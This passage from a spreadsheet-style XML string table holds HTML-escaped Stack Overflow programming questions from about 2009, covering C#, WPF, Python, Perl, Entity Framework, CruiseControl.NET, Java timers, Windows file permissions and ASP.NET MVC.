  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am making a DAL template with C# and I am wondering what is the most efficient way to access schema information with ODBC and OleDB. I need the columns, column types, and primary key information.&lt;/p&gt;
&lt;p&gt;thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically binding List to ListBox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lets say for instance i have the following extremely simple window:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Window x:Class="CalendarGenerator.Window1"
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    Title="Window1" Height="300" Width="447"&amp;gt;
    &amp;lt;Grid&amp;gt;
        &amp;lt;ListBox Margin="12,40,0,12" Name="eventList" HorizontalAlignment="Left" Width="134" /&amp;gt;
    &amp;lt;/Grid&amp;gt;
&amp;lt;/Window&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And a simple list defined as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;String&amp;gt; ListOfNames = new List&amp;lt;String&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And lets assume that the list has several names in it. How would i go about binding the List to the ListBox using as much code-behind as possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>variable button vb.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i declared a global variable button:&lt;/p&gt;
&lt;p&gt;Dim button1 As New Button()&lt;/p&gt;
&lt;p&gt;Now, i dont know how to add a click event in this button since it is a variable. Do you have any idea how do i do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I determine the size of an object in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C, we can find the size of an &lt;code&gt;int&lt;/code&gt;, &lt;code&gt;char&lt;/code&gt;, etc. I want to know how to get size of objects like a string, integer, etc. in Python.&lt;/p&gt;
&lt;p&gt;Related question: &lt;a href="http://stackoverflow.com/questions/135664/how-many-bytes-per-element-are-there-in-a-python-list-tuple"&gt;How many bytes per element are there in a Python list (tuple)?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I am using an XML file which contains size fields that specify the size of value. I must parse this XML and do my coding. When I want to change the value of a particular field, I will check the size field of that value. Here I want to compare whether the new value that I'm gong to enter is of the same size as in XML. I need to check the size of new value. In case of a string I can say its the length. But in case of int, float, etc. I am confused.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Webbased MySQL interface better that phpMyAdmin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any webbased interface for MySQL better than phpMyAdmin? I use phpMyAdmin a lot but it is becoming a pain, especially it is slow sometimes. &lt;/p&gt;
&lt;p&gt;I'd like to have deep export functionality like phpMyAdmin but more design features&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between DoS and Brute Force attacks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading about DoS attacks on Apache servers but the "Brute Force" word pops up sometimes I know DoS attacks but "Brute Force" seems to be similar, is there a difference or it is just another word of DoS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I monkey-patch an instance method in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to monkey-patch (duck-punch :-) a &lt;code&gt;LWP::UserAgent&lt;/code&gt; instance, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sub _user_agent_get_basic_credentials_patch {
  return ($username, $password);
}
my $agent = LWP::UserAgent-&amp;gt;new();
$agent-&amp;gt;get_basic_credentials = _user_agent_get_basic_credentials_patch;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This isn't the right syntax -- it yields:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Can't modify non-lvalue subroutine
  call at [module] line [lineno].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As I recall (from &lt;em&gt;Programming Perl&lt;/em&gt;), dispatch lookup is performed dynamically based on the blessed package (&lt;code&gt;ref($agent)&lt;/code&gt;, I believe), so I'm not sure how instance monkey patching would even work without affecting the blessed package.&lt;/p&gt;
&lt;p&gt;I know that I can subclass the &lt;code&gt;UserAgent&lt;/code&gt;, but I would prefer the more concise monkey-patched approach. Consenting adults and what have you. ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Error: The object cannot be deleted because it was not found in the ObjectStateManager</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Trying to get a handle on Entity Framework here and I am hitting some speed bumps...
I have a Get() method that works fine and has been tested, but my Delete method is not working:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   public static void Delete(string name)
    {
        J1Entities db = new J1Entities();
        db.DeleteObject(Get(name));
        db.SaveChanges();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get the following error: 
&lt;strong&gt;Error: The object cannot be deleted because it was not found in the ObjectStateManager.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I ran the debugger, and the object inside the DeleteObject is correct... what am I missing?  Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dividing workload on several threads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if anyone knows about a good article which describes dividing workload on to several Threads? Preferebly it would be written for C# but it's really the concept I'm after, so it's not an issue if it's written for a different, similar, language.&lt;/p&gt;
&lt;p&gt;I have a problem where I would have to divide a large amount of computing into several threads and then Sum the generated data after one iteration completes (so I would need to know that all threads have finished) and then start a new iteration, supplying all the threads with the data generated in the last iteration (the data would be modified before the end of each iteration).&lt;/p&gt;
&lt;p&gt;I hope this makes sense, and is possible. Either way I would appreciate some advice on how to tackle the problem of computing large amounts of data divided on to several threads (so I can use more than one processor's core).&lt;/p&gt;
&lt;p&gt;Thank you for your answers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>About mobile game porting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to ask a few questions regarding mobile game porting...&lt;/p&gt;
&lt;p&gt;Let say if I have a simple 2D C++ game engine and have a PC game based on that engine and I want to port it to different mobile platforms BREW, J2ME, iPhone, Android, Symbian, etc..&lt;/p&gt;
&lt;p&gt;Do I need to re-code the engine and the game for each platform? or is there an easier and more efficient way? I am sure the process is complicated since different phones have different graphic/processor/memory/etc. I am just curious about the overview of mobile game porting process. :)&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommended JavaScript HTML template library for JQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any suggestions on which HTML template library would go well with JQuery?  Googling turns up quite a number of libraries but I'm not sure whether there is a well recognized library that would stand the test of time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do i combine a list and a form in the same page using django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Am building a Q&amp;amp;A page, sort of stackoverflow kinda page! Am having a bit of a problem trying to render the form. Am pasing 3 objects to the template that renders the page i.e. Question object, Answers related to the question and Answer form object.&lt;/p&gt;
&lt;p&gt;In the first part of the page i want to display the Question, then the answers list follows, then at the bottom  i display my form to enter the new answer.&lt;/p&gt;
&lt;p&gt;On my template when i use the {{ extends "base_site.html" }} tag then only the form get rendered, 
When i remove that tag then only the Question section  get displayed minus the form!!&lt;/p&gt;
&lt;p&gt;How can i go round this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Communicating with the web through a C# app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Although i can grasp the concepts of the .Net framework and windows apps, i want to create an app that will involve me simulating website clicks and getting data/response times from that page. I have not had any experience with web yet as im only a junior, could someone explain to me (in english!!) the basic concepts or with examples, the different ways and classes that could help me communicate with a website?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there already some std::vector based set/map implementation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For small sets or maps, it's usually much faster to just use a sorted vector, instead of the tree-based &lt;code&gt;set&lt;/code&gt;/&lt;code&gt;map&lt;/code&gt; - especially for something like 5-10 elements. LLVM has some classes &lt;a href="http://llvm.org/docs/ProgrammersManual.html#ds_sequential"&gt;in that spirit&lt;/a&gt;, but no real adapter that would provide a &lt;code&gt;std::map&lt;/code&gt; like interface backed up with a &lt;code&gt;std::vector&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Any (free) implementation of this out there?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Thanks for all the alternative ideas, but I'm really interested in a vector based set/map. I do have specific cases where I tend to create huge amounts of sets/maps which contain usually less than 10 elements, and I do really want to have less memory pressure. Think about for example neighbor edges for a vertex in a triangle mesh, you easily wind up with 100k sets of 3-4 elements each.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running Cruise Control .NET as a Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been configuring and testing CCNet for a little while now using Virtual PC to host it. Everything went well and it was decided to transfer the configuration to a server location - which went as well as could be expected. A few tweaks and kicks and i had it running as before.&lt;/p&gt;
&lt;p&gt;The problem is that we now need to run CCNet as a service which is proving problematic.&lt;/p&gt;
&lt;p&gt;I have configured a domain level user with the same access rights as myself (after all, the console application has been running as me for about 3 months now) and configured the service to run under that user. &lt;/p&gt;
&lt;p&gt;I started the service and it hung! [I'll not bore you with the details of forcing the service to stop and closing the sockets that were held open]. When I was eventually able to run the console again I did a 'Run As' and entered the 'cruisecontrol' user details, click OK and saw that there was a problem accessing SVN via https. I've sorted that by running IE as 'cruisecontrol', navigating to the repository and accepting/installing the certificate.
Next when I ran the console application as 'cruisecontrol' it hangs after the following lines:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;
2009-01-15 16:55:50,994 [Pepsi Webservices:DEBUG] Running Subversion with arguments : log --xml --limit 1 https://ash-dev-005.[path to trunk]&lt;/p&gt;
&lt;p&gt;2009-01-15 16:55:51,478 [Pepsi Webservices:DEBUG] Authentication realm: https://ash-dev-005.[path to repository] Subversion Repositories
&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;After it times out I can close the console, run it as normal (i.e. as me) and it runs fine. I have tried logging into the server as the 'cruisecontrol' user and tried running the console but with the same result.&lt;/p&gt;
&lt;p&gt;Now, heres the thing: This morning I logged into the server as the 'cruisecontrol' user and opened a command window. I navigated to the trunk of my project and typed 'svn update' and was prompted for a password. &lt;/p&gt;
&lt;p&gt;This is not surprising but the line above that prompt was the 'Authentication realm:...' line above! Looking at the log file, sure enough right after the process is killed by CCNet there is a prompt for a password. Is CCNet/SVN waiting for a password entry and then timing out? If so, why it is not using the one in the config file?&lt;/p&gt;
&lt;p&gt;I entered the password and the update proceeded without any problems (so the cruisecontrol user does have permissions to access the repository from the server). I entered the command again and was not prompted a second time so i tried opening a new command window and rerunning the command - still not prompted for a password so i logged out and back in (as cruisecontrol) and tried again but was still not prompted.&lt;/p&gt;
&lt;p&gt;The good news is that when I run the console application as the cruisecontrol user (whether logged in as cruisecontrol or just using Run As) everything appears to be OK.&lt;/p&gt;
&lt;p&gt;So what's my question? 
    Well, why is CCNet not using the password in the config file?
    How has entering the password in the command prompt resolved the problem (and will it persist)?&lt;/p&gt;
&lt;p&gt;Any suggestions/insight appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to copy a recursive directory structure in TFS Team Build?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to copy a directory in a team build target?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you achieve field level security in ASP.Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an .aspx form with 20 fields that must be disable based on a users role and a status of a order record.  Currently the application has 5 roles and 3 status, so I have 300 different possible conditions that I have to account for. &lt;/p&gt;
&lt;p&gt;My first thought is to store each permutation in a table, then set the fields when the page loads by looping through the fields.  Is there a better way?  Please note, I am using  .Net 2.0 and NOT MVC.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A priority queue which allows efficient priority update?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: Here's &lt;a href="http://tinyurl.com/7zgwb4"&gt;my implementation of Hashed Timing Wheels&lt;/a&gt;.  Please let me know if you have an idea to improve the performance and concurrency. (20-Jan-2009)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Sample usage:
public static void main(String[] args) throws Exception {
    Timer timer = new HashedWheelTimer();
    for (int i = 0; i &amp;lt; 100000; i ++) {
        timer.newTimeout(new TimerTask() {
            public void run(Timeout timeout) throws Exception {
                // Extend another second.
                timeout.extend();
            }
        }, 1000, TimeUnit.MILLISECONDS);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: I solved this problem by using &lt;a href="http://www.cse.wustl.edu/~cdgill/courses/cs6874/TimingWheels.ppt"&gt;Hierarchical and Hashed Timing Wheels&lt;/a&gt;. (19-Jan-2009)&lt;/p&gt;
&lt;p&gt;I'm trying to implement a special purpose timer in Java which is optimized for timeout handling.  For example, a user can register a task with a dead line and the timer could notify a user's callback method when the dead line is over.  In most cases, a registered task will be done within a very short amount of time, so most tasks will be canceled (e.g. task.cancel()) or rescheduled to the future (e.g. task.rescheduleToLater(1, TimeUnit.SECOND)).&lt;/p&gt;
&lt;p&gt;I want to use this timer to detect an idle socket connection (e.g. close the connection when no message is received in 10 seconds) and write timeout (e.g. raise an exception when the write operation is not finished in 30 seconds.)  In most cases, the timeout will not occur, client will send a message and the response will be sent unless there's a weird network issue..  &lt;/p&gt;
&lt;p&gt;I can't use java.util.Timer or java.util.concurrent.ScheduledThreadPoolExecutor because they assume most tasks are supposed to be timed out.  If a task is cancelled, the cancelled task is stored in its internal heap until ScheduledThreadPoolExecutor.purge() is called, and it's a very expensive operation. (O(NlogN) perhaps?)&lt;/p&gt;
&lt;p&gt;In traditional heaps or priority queues I've learned in my CS classes, updating the priority of an element was an expensive operation (O(logN) in many cases because it can only be achieved by removing the element and re-inserting it with a new priority value.  Some heaps like Fibonacci heap has O(1) time of decreaseKey() and min() operation, but what I need at least is fast increaseKey() and min() (or decreaseKey() and max()).&lt;/p&gt;
&lt;p&gt;Do you know any data structure which is highly optimized for this particular use case?  One strategy I'm thinking of is just storing all tasks in a hash table and iterating all tasks every second or so, but it's not that beautiful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if a file can be created inside given directory on MS XP/Vista?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a code that creates file(s) in user-specified directory. User can point to a directory in which he can't create files, but he can rename it.&lt;/p&gt;
&lt;p&gt;I have created directory for test purposes, let's call it &lt;code&gt;C:\foo&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;I have following permissions to &lt;code&gt;C:\foo&lt;/code&gt;:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Traversing directory/Execute file  &lt;/li&gt;
&lt;li&gt;Removing subfolders and files&lt;/li&gt;
&lt;li&gt;Removing&lt;/li&gt;
&lt;li&gt;Read permissions&lt;/li&gt;
&lt;li&gt;Change permissions&lt;/li&gt;
&lt;li&gt;Take ownership&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I don't have any of the following permissions to &lt;code&gt;C:\foo&lt;/code&gt;:  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Full Control  &lt;/li&gt;
&lt;li&gt;File creation  &lt;/li&gt;
&lt;li&gt;Folder creation  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have tried following approaches, so far:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;br /&gt;
os.access('C:\foo', os.W_OK) == True  &lt;/p&gt;
&lt;p&gt;st = os.stat('C:\foo')&lt;br /&gt;
mode = st[stat.ST_MODE]&lt;br /&gt;
mode &amp;amp; stat.S_IWRITE == True 
&lt;/code&gt;  &lt;/p&gt;
&lt;p&gt;I believe that this is caused by the fact that I can rename folder, so it is changeable for me. But it's content - not. &lt;/p&gt;
&lt;p&gt;Does anyone know how can I write code that will check for a given directory if current user has permissions to create file in that directory?&lt;/p&gt;
&lt;p&gt;In brief - I want to check if current user has &lt;strong&gt;File creation&lt;/strong&gt; and &lt;strong&gt;Folder creation&lt;/strong&gt; permissions for given folder name.&lt;/p&gt;
&lt;p&gt;EDIT: The need for such code arisen from the Test case no 3 from 'Certified for Windows Vista' program, which states: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;ol&gt;
  &lt;li&gt;The application must not allow the Least-Privileged user to save any files to Windows System directory in order to pass this test case.  &lt;/li&gt;
  &lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;Should this be understood as 'Application may try to save file in Windows System directory, but shouldn't crash on failure?' or rather 'Application has to perform security checks before trying to save file?' &lt;/p&gt;
&lt;p&gt;Should I stop bothering just because Windows Vista itself won't allow the Least-Privileged user to save any files in %WINDIR%? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python Path</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am installing active python, django. I really dont know how to set the python path in vista environment system. first of all will it work in vista.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to unit-test a file writing method with Visual Studio's built-in automated tests?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;&lt;p&gt;I use Visual Studio 2008 Professional automated tests. I have a function that writes to a file. I want to unit test the file writing function. I have read somewhere that I would have to mock a file somehow. I don't know how to do it. Can you help?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;How to unit-test a method that downloads a page from the Internet?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Login to the page with HttpWebRequest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I login to the this page &lt;a href="http://www.bhmobile.ba/portal/index"&gt;http://www.bhmobile.ba/portal/index&lt;/a&gt; by using HttpWebRequest? &lt;/p&gt;
&lt;p&gt;Login button is "PoÅ¡alji" (upper left corner).&lt;/p&gt;
&lt;h3&gt;HTML source of login page:&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table id="maintable" border="0" cellspacing="0" cellpadding="0" style="height:100%; width:100%"&amp;gt;
  &amp;lt;tr&amp;gt;
    &amp;lt;td width="367" style="vertical-align:top;padding:3px"&amp;gt;&amp;lt;script type="text/javascript"&amp;gt;
function checkUserid(){
    if (document &amp;amp;&amp;amp; document.getElementById){
    	var f = document.getElementById('userid');
    	if (f){
    		if (f.value.length &amp;lt; 8){
    			alert('KorisniÄko ime treba biti u formatu 061/062 xxxxxx !');
    			return false;
    		}
    	}
    }
    return true;
}
&amp;lt;/script&amp;gt;
&amp;lt;div style="margin-bottom:12px"&amp;gt;&amp;lt;table class="leftbox" style="height:184px; background-image:url(/web/2007/slike/okvir.jpg);" cellspacing="0" cellpadding="0"&amp;gt;
    &amp;lt;tr&amp;gt;
    	&amp;lt;th style="vertical-align:middle"&amp;gt;&amp;lt;form action="http://sso.bhmobile.ba/sso/login" method="post" onSubmit="return checkUserid();"&amp;gt;
    		&amp;lt;input type="hidden" name="realm" value="sso"&amp;gt;
    		&amp;lt;input type="hidden" name="application" value="portal"&amp;gt;
    		&amp;lt;input type="hidden" name="url" value="http://www.bhmobile.ba/portal/redirect?type=ssologin&amp;amp;amp;url=/portal/show?idc=1111"&amp;gt;
    		&amp;lt;table class="formbox" align="center" cellspacing="0" cellpadding="0"&amp;gt;
    		  	&amp;lt;tr&amp;gt;
    				&amp;lt;th style="vertical-align:middle; text-align:right;padding-right:4px;"&amp;gt;Korisnik:&amp;lt;/th&amp;gt;
    				&amp;lt;td&amp;gt;&amp;lt;input type="text" size="20" id="userid" name="userid"/&amp;gt;&amp;lt;/td&amp;gt;
    			&amp;lt;/tr&amp;gt;
    		  	&amp;lt;tr&amp;gt;
    				&amp;lt;th style="text-align:right;padding-right:4px;"&amp;gt;Lozinka:&amp;lt;/th&amp;gt;
    				&amp;lt;td&amp;gt;&amp;lt;input type="password" size="20" name="password" /&amp;gt;&amp;lt;/td&amp;gt;
    			&amp;lt;/tr&amp;gt;
    		  	&amp;lt;tr&amp;gt;
    				&amp;lt;th colspan="2"&amp;gt;
    				     &amp;lt;input class="dugmic" type="image" id="prijava1" alt="Prijava" src="/web/2007/dugmici/posalji_1.jpg" onmouseover="ChangeImage('prijava1','/web/2007/dugmici/posalji_2.jpg')" onmouseout="ChangeImage('prijava1','/web/2007/dugmici/posalji_1.jpg')"&amp;gt;
    		     	&amp;lt;/th&amp;gt;
    			&amp;lt;/tr&amp;gt;
    		&amp;lt;/table&amp;gt;
    		&amp;lt;div style="padding:12px;"&amp;gt;
    			&amp;lt;a href="/portal/show?idc=1121"&amp;gt;Da li ste novi BH Mobile korisnik?&amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
    			&amp;lt;a href="/portal/show?idc=1121"&amp;gt;Da li ste zaboravili lozinku(Å¡ifru)?&amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;
    		&amp;lt;/div&amp;gt;
    	&amp;lt;/form&amp;gt;&amp;lt;/th&amp;gt;
    &amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Form action is &lt;a href="http://sso.bhmobile.ba/sso/login"&gt;http://sso.bhmobile.ba/sso/login&lt;/a&gt;.
How can I use this with HttpWebRequest to get a cookie and use some date from this page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is modulus different in different programming languages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Perl&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print 2 % -18;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;--&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-16
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Tcl&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;puts [expr {2 % -18}]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;--&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-16
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but VBScript&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wscript.echo 2 mod -18
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;--&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Why the difference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to build a search function</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a website that has over 400,000 items.  Some similar, some vastly different.  We want to provide a way to search these items the best way possible.  After being delivered the website it was using full text indexing.  The solution is basic at best, woefully inadequate at worst.  &lt;/p&gt;
&lt;p&gt;So what is the best way to search these items?  They are stored in a SQL Server Database (2005).  Our website is designed in C# 2.0.  &lt;/p&gt;
&lt;p&gt;Currently here is the process:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;User enters value into text box.&lt;/li&gt;
&lt;li&gt;We 'clean' this entry.  Removing 'scary' characters that could be an attempted hack. Remove key words (and, or, etc..)&lt;/li&gt;
&lt;li&gt;Pass value into a stored procedure to return results.&lt;/li&gt;
&lt;li&gt;Return results.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>What do &lt; and &gt; mean such as implements Comparable&lt;BigInteger&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Java 1.4.2, class &lt;a href="http://java.sun.com/j2se/1.4.2/docs/api/java/math/BigInteger.html" rel="nofollow"&gt;java.math.BigInteger&lt;/a&gt; implements interfaces Comparable, Serializable.&lt;/p&gt;
&lt;p&gt;In Java 1.5.0, class &lt;a href="http://java.sun.com/j2se/1.5.0/docs/api/java/math/BigInteger.html" rel="nofollow"&gt;java.math.BigInteger&lt;/a&gt; implements interfaces Serializable, Comparable&amp;lt;BigInteger&amp;gt;.&lt;/p&gt;
&lt;p&gt;This is just an example to help me ask about &amp;lt; and &amp;gt;.  What I am really wondering about is the &amp;lt; and &amp;gt; stuff.&lt;/p&gt;
&lt;p&gt;My question is threefold: What does the &amp;lt;BigInteger&amp;gt; part of the implements statement mean, what is that syntax called, and what does it do?&lt;/p&gt;
&lt;p&gt;P.S. It's really hard to google for &amp;lt; and &amp;gt; and impossible to search SO for &amp;lt; and &amp;gt; in the first place.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Only create a TFS work item on a new failed build</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've seen the post about disabling work item creation on all failed builds, but I'd like to have TFS only create a work item on the first failure.  We have a very complicated legacy system that involves VB6 COM components and frequently have build failures on the build server that track back to some funkiness VB6 does with binary files (frx, ctl, etc. -- if you haven't had to deal with that in a while, you don't want to).  The only way to resolve those issues is to try to make updates on a developer machine, then check in the files and run the build again (since the build doesn't fail on the dev machine).  So we may have three or four (or more) failed builds before we get a success, which means we'll have three or four work items to close out.&lt;/p&gt;
&lt;p&gt;Ideally, I'd like to have the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Joe checks in a change that causes the build to fail&lt;/li&gt;
&lt;li&gt;A work item gets created and assigned to Joe&lt;/li&gt;
&lt;li&gt;Joe checks in another change and the build still fails&lt;/li&gt;
&lt;li&gt;No additional work item creation&lt;/li&gt;
&lt;li&gt;Joe checks in a change the build succeeds&lt;/li&gt;
&lt;li&gt;The work item assigned to Joe in step 2 above gets marked as Closed&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;But I'd be happy with just steps 1 through 4.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change the ruby process name in top</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to change the name of the ruby process that gets displayed in the linux/unix top command. I have tried the &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$0='miname'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;approach but it only works with the ps command and in top the process keeps getting displayed as "ruby"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual C++ 2005 hangs during qt builds</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At my shop, the main product app is a mongrel built on MFC, QT and other random things devs have thrown in over the years.
In the current stack, Qt toolkit is on the way out, but still features heavily.&lt;/p&gt;
&lt;p&gt;If I have SQL 2005 Management studio open and have to do a full build, it usually hangs a CPU (even after the offending process is taken out back and shot...) during the qt specific parts of the build (Moc'ing and UIC'ing)&lt;/p&gt;
&lt;p&gt;has anyone seen anything like this? any ideas what the problem could be?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Standard Link/Href As Save Button And Model IS NUll</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay so, i am totally new to MVC and I'm trying to wrap my head around a few of the concepts. I've created a small application...&lt;/p&gt;
&lt;p&gt;This application has a view for creating a new Individual record. The view is bound to a model &lt;strong&gt;ViewPage&lt;/strong&gt;... And I have a associated &lt;strong&gt;IndividualController&lt;/strong&gt; which has a &lt;strong&gt;New&lt;/strong&gt; method...&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;New&lt;/strong&gt; method of the IndividualController looks like this...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ActionResult New()
    {
        var i = new Individual();
        this.Title = "Create new individual...";
        i.Id = Guid.NewGuid();
        this.ViewData.Model = new Individual();
        return View();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, the above all seems to be working. When the view loads I am able to retrieve the data from the Individual object. The issue comes into play when I try and save the data back through the controller...&lt;/p&gt;
&lt;p&gt;In my &lt;strong&gt;IndividualController&lt;/strong&gt; I also have a &lt;strong&gt;Save&lt;/strong&gt; method which accepts an incoming parameter of type &lt;strong&gt;Individual&lt;/strong&gt;. The method looks like...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   public ActionResult Save(IndividualService.Individual Individual)
    {
        return RedirectToAction("New");
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, on my view I wanted to use a standard html link/href to be used as the "Save" button so I defined an ActionLink like so...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;%=Html.ActionLink("Save", "Save") %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, defined in my view I have created a single textbox to hold the first name as a test like so...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;% using (Html.BeginForm()) { %&amp;gt;
     &amp;lt;%=Html.TextBox("FirstName", ViewData.Model.FirstName)%&amp;gt;
 &amp;lt;% } %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, if I put a break point in the &lt;strong&gt;Save&lt;/strong&gt; method and click the "Save" link in my view the break point is hit within my controller. The issue is that the input parameter of the Save method is null; even if I type a value into the first name textbox...&lt;/p&gt;
&lt;p&gt;Obviously I am doing something completely wrong. Can someone set me straight...&lt;/p&gt;
&lt;p&gt;Thanks in advance...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can the DllMain of an .exe be called?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My question is not exactly the same as &lt;a href="http://stackoverflow.com/questions/186502/dllmain-in-an-exe"&gt;this one&lt;/a&gt; (it's not theoretical, there is only a main thread without message loop, InitInstance and ExitInstance are no fitting calls).&lt;/p&gt;
